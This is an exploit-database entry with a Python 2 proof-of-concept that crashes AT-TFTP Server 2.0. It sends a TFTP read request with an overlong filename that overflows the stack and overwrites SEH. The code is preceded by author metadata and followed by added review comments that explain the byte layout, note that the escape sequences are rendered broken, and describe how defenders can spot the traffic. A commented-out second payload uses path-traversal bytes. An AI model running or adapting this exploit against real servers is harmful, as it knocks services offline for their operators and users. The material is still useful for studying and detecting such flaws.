
# Title : AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS
# Published : 2013-04-12
# Author :


# Exploit Title: AT-TFTP 2.0 long filename stack-based buffer overflow - DoS
# Date: 12.04.2013
# Exploit Author: xis_one@STM Solutions 
# Vendor Homepage:  http://www.alliedtelesis.com/
# Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_created=981539150&p_topview=1 
# Version: 2.0 
# Tested on: Windows XP SP3
#
# From the 1.9 remote code execution BOF discovered in 2006 by liuqx@nipc.org.cn to the 2.0 remote DoS BOF in 2013 - no lesson learned.
# Two variants:
#
# 1. SEH overwrite, but no exception handler is triggered (stack cookie?)
# 2. Read access violation (non-exploitable?)
#
# Still, we can crash the server remotely.
#
#!/usr/bin/python
import socket
import sys
# One-shot PoC: build a single TFTP read request with an oversized filename
# and send it as one UDP datagram to the target, which the header says crashes
# AT-TFTP 2.0 (denial of service; no exception handler is ever reached).
#
# NOTE(review): every "\x" escape on this page has been rendered as a bare "x"
# (e.g. "xCC" instead of "\xCC"), so the literals below are ASCII text, not the
# byte values the comments describe, and "xCC"*257 is 771 characters rather
# than 257 bytes. The byte counts in the comments refer to the intended bytes.
#
# NOTE(review): Python 2 script - str literals are byte strings here. Under
# Python 3, socket.sendto() rejects a str and raises TypeError.
#
# Defender view: the trigger is a TFTP RRQ on UDP/69 whose filename field is
# several hundred bytes long; a request that size is easy to spot on the wire
# and TFTP should not be reachable from untrusted networks in the first place.

# Hard-coded target address and the standard TFTP port; the script sends
# exactly one datagram to this endpoint and exits.
host = '192.168.1.32'
port = 69

# Intended next-SEH pointer (four 0xCC bytes per the author's comment below).
nseh="xCCxCCxCCxCC"

# The SEH handler is overwritten at byte 261 of the payload, but no exception
# is triggered, so the overwrite is never used (hence DoS rather than code
# execution).
 
seh="x18x0Bx27" # Breakpoint in no SafeSEH space in Windows XP SP3 (per author)


# Filename field: 257 bytes of filler, then nSEH and SEH, then a NUL, "3137"
# and another NUL (intended layout; see the escape-rendering note above).
payload="xCC"*257 + nseh + seh + "x00" + "3137" + "x00"

#payload to get access violation:
#payload=("x00x01x25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x25"
#"x35x63x2ex2ex25x32x35x25x35x63x2ex2ex25x32x35x35"
#"x63x65x74x63x25x32x35x35x63x68x6fx73x74x73x00x6e"
#"x00")

# Full datagram: a 2-byte opcode (presumably 0x0001, the TFTP RRQ opcode of
# RFC 1350), the filename, a separator byte, the transfer mode "netascii" and
# a terminating NUL. Standard RRQ layout is opcode, filename, NUL, mode, NUL;
# the author's extra "x06" between filename and mode is kept as written.
buffer="x00x01"+  payload + "x06" + "netascii" + "x00"


# Fire-and-forget UDP send; no reply is read and the socket is never closed
# (acceptable for a one-shot script, the OS reclaims it on exit).
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(buffer, (host, port))